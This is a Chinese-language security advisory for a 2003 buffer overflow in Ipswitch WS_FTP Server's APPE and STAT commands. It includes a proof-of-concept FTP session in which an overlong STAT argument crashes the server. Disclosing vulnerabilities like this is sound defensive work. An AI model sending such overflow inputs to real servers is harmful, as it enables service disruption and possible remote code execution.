Ipswitch WS_FTP Server FTP命令缓冲区溢出漏洞发布时间:2003-09-04 更新时间:2003-09-06 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:8542 受影响系统 Ipswitch WS FTP Server 3.4详细描述 Ipswitch WS_FTP Server在处理客户端发送的APPE及STAT命令的后续数据时存在缓冲区溢出漏洞,远程攻击者登录FTP服务器成功以后发送超长的数据会导致缓冲区溢出,可能在主机上执行任意指令。 测试代码 C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60 Connected to 81.93.35.60. 220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574) 220-Wed Sep 03 23:58:59 2003 220-29 days remaining on evaluation. 220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574) User (81.93.35.60:(none)): pejman 331 Password required Password: 230 user logged in ftp> quote Command line to send stat aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Connection closed by remote host. ftp> 解决方案 厂商还未提供解决方案。 相关信息 Remote and Local Vulnerabilities In WS_FTP Server http://archives.neohapsis.com/archives/bugtraq/2003-09/0090.html |
